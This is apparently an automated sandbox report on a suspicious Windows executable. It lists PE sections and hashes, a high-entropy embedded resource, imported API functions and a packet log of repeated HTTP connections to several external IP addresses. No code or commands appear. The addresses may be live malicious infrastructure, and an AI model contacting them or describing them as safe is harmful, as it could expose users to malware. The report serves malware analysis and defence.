                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x60d9c.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x6c4c.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0xc40000x60d9c0x60e00c03eaa19b77709af61df9189a9420dc0False0.9326335685483871data7.903323802148049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x1250000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                RT_RCDATA0xcc7b80x580a1data1.0003216780501873
                                                RT_GROUP_ICON0x12485c0x76dataEnglishGreat Britain0.6610169491525424
                                                RT_GROUP_ICON0x1248d40x14dataEnglishGreat Britain1.25
                                                RT_GROUP_ICON0x1248e80x14dataEnglishGreat Britain1.15
                                                RT_GROUP_ICON0x1248fc0x14dataEnglishGreat Britain1.25
                                                RT_VERSION0x1249100xdcdataEnglishGreat Britain0.6181818181818182
                                                RT_MANIFEST0x1249ec0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                DLLImport
                                                WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                PSAPI.DLLGetProcessMemoryInfo
                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                UxTheme.dllIsThemeActive
                                                KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishGreat Britain
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 25, 2024 13:45:08.700851917 CET4980380192.168.2.53.33.130.190
                                                Nov 25, 2024 13:45:08.821219921 CET80498033.33.130.190192.168.2.5
                                                Nov 25, 2024 13:45:08.821461916 CET4980380192.168.2.53.33.130.190
                                                Nov 25, 2024 13:45:08.830140114 CET4980380192.168.2.53.33.130.190
                                                Nov 25, 2024 13:45:08.951952934 CET80498033.33.130.190192.168.2.5
                                                Nov 25, 2024 13:45:09.977929115 CET80498033.33.130.190192.168.2.5
                                                Nov 25, 2024 13:45:09.978354931 CET80498033.33.130.190192.168.2.5
                                                Nov 25, 2024 13:45:09.978414059 CET4980380192.168.2.53.33.130.190
                                                Nov 25, 2024 13:45:09.981529951 CET4980380192.168.2.53.33.130.190
                                                Nov 25, 2024 13:45:10.101771116 CET80498033.33.130.190192.168.2.5
                                                Nov 25, 2024 13:45:26.036274910 CET4984180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:26.157422066 CET804984185.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:26.157552004 CET4984180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:26.169488907 CET4984180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:26.290071964 CET804984185.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:27.682363033 CET4984180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:27.802766085 CET804984185.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:27.802886009 CET4984180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:28.701056957 CET4984880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:28.821197987 CET804984885.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:28.821377993 CET4984880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:28.832938910 CET4984880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:28.954277992 CET804984885.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:30.338679075 CET4984880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:30.459242105 CET804984885.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:30.459403038 CET4984880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:31.357497931 CET4985580192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:31.477766991 CET804985585.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:31.477912903 CET4985580192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:31.489171982 CET4985580192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:31.609949112 CET804985585.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:31.609986067 CET804985585.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:32.994842052 CET4985580192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:33.115359068 CET804985585.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:33.115502119 CET4985580192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:34.014170885 CET4986180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:34.134689093 CET804986185.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:34.134816885 CET4986180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:34.142415047 CET4986180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:34.262518883 CET804986185.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:35.510227919 CET804986185.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:35.510595083 CET804986185.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:35.510662079 CET4986180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:35.513577938 CET4986180192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:35.634056091 CET804986185.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:41.388082027 CET4987880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:41.508322954 CET804987885.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:41.508460999 CET4987880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:41.519741058 CET4987880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:41.639708042 CET804987885.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:43.026191950 CET4987880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:43.146836996 CET804987885.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:43.146955967 CET4987880192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:44.044742107 CET4988380192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:44.165005922 CET804988385.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:44.166847944 CET4988380192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:44.178072929 CET4988380192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:44.298203945 CET804988385.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:45.682434082 CET4988380192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:45.802936077 CET804988385.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:45.803091049 CET4988380192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:46.701129913 CET4989080192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:46.828195095 CET804989085.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:46.828439951 CET4989080192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:46.839812994 CET4989080192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:46.960153103 CET804989085.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:46.960213900 CET804989085.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:48.354609966 CET4989080192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:48.475122929 CET804989085.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:48.475198030 CET4989080192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:49.378292084 CET4989780192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:49.503873110 CET804989785.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:49.504055023 CET4989780192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:49.512181997 CET4989780192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:49.633934021 CET804989785.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:50.889753103 CET804989785.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:50.889986038 CET804989785.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:50.890034914 CET4989780192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:50.893342972 CET4989780192.168.2.585.159.66.93
                                                Nov 25, 2024 13:45:51.013514042 CET804989785.159.66.93192.168.2.5
                                                Nov 25, 2024 13:45:56.317042112 CET4991280192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:45:56.437117100 CET8049912209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:45:56.437211037 CET4991280192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:45:56.449096918 CET4991280192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:45:56.569231033 CET8049912209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:45:57.758435965 CET8049912209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:45:57.762772083 CET8049912209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:45:57.762860060 CET4991280192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:45:57.965420961 CET4991280192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:45:58.982693911 CET4991980192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:45:59.102775097 CET8049919209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:45:59.102899075 CET4991980192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:45:59.116415977 CET4991980192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:45:59.236743927 CET8049919209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:00.369699955 CET8049919209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:00.369724035 CET8049919209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:00.369856119 CET4991980192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:00.620039940 CET4991980192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:01.643660069 CET4992580192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:01.764240026 CET8049925209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:01.764487028 CET4992580192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:01.782574892 CET4992580192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:01.902690887 CET8049925209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:01.902913094 CET8049925209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:02.991245985 CET8049925209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:02.991377115 CET8049925209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:02.991420984 CET4992580192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:03.291882038 CET4992580192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:04.311057091 CET4993180192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:04.430948973 CET8049931209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:04.431113005 CET4993180192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:04.438564062 CET4993180192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:04.559777975 CET8049931209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:05.707319975 CET8049931209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:05.707381010 CET8049931209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:05.707493067 CET4993180192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:05.711133003 CET4993180192.168.2.5209.74.64.59
                                                Nov 25, 2024 13:46:05.831202984 CET8049931209.74.64.59192.168.2.5
                                                Nov 25, 2024 13:46:11.194809914 CET4994780192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:11.317435026 CET8049947104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:11.317509890 CET4994780192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:11.328955889 CET4994780192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:11.453494072 CET8049947104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:12.627779961 CET8049947104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:12.627860069 CET8049947104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:12.627912045 CET4994780192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:12.628742933 CET8049947104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:12.628802061 CET4994780192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:12.842052937 CET4994780192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:13.857773066 CET4995680192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:13.977893114 CET8049956104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:13.978004932 CET4995680192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:13.989463091 CET4995680192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:14.109425068 CET8049956104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:15.268276930 CET8049956104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:15.268316031 CET8049956104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:15.268382072 CET4995680192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:15.269982100 CET8049956104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:15.270220041 CET4995680192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:15.494884968 CET4995680192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:16.920227051 CET4996480192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:17.040399075 CET8049964104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:17.040646076 CET4996480192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:17.052710056 CET4996480192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:17.172981977 CET8049964104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:17.173048973 CET8049964104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:18.381800890 CET8049964104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:18.381902933 CET8049964104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:18.381993055 CET4996480192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:18.382411957 CET8049964104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:18.382493973 CET4996480192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:18.559619904 CET4996480192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:19.575925112 CET4997080192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:19.696268082 CET8049970104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:19.696371078 CET4997080192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:19.703615904 CET4997080192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:19.823652983 CET8049970104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:21.082176924 CET8049970104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:21.082195044 CET8049970104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:21.082379103 CET4997080192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:21.082391024 CET8049970104.21.49.253192.168.2.5
                                                Nov 25, 2024 13:46:21.082442999 CET4997080192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:21.085416079 CET4997080192.168.2.5104.21.49.253
                                                Nov 25, 2024 13:46:21.205368042 CET8049970104.21.49.253192.168.2.5
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 25, 2024 13:45:08.101392984 CET6118853192.168.2.51.1.1.1
                                                Nov 25, 2024 13:45:08.691190958 CET53611881.1.1.1192.168.2.5
                                                Nov 25, 2024 13:45:25.031147957 CET6531153192.168.2.51.1.1.1
                                                Nov 25, 2024 13:45:26.026258945 CET6531153192.168.2.51.1.1.1
                                                Nov 25, 2024 13:45:26.033735991 CET53653111.1.1.1192.168.2.5
                                                Nov 25, 2024 13:45:26.164715052 CET53653111.1.1.1192.168.2.5
                                                Nov 25, 2024 13:45:40.529922009 CET6060553192.168.2.51.1.1.1
                                                Nov 25, 2024 13:45:41.385516882 CET53606051.1.1.1192.168.2.5
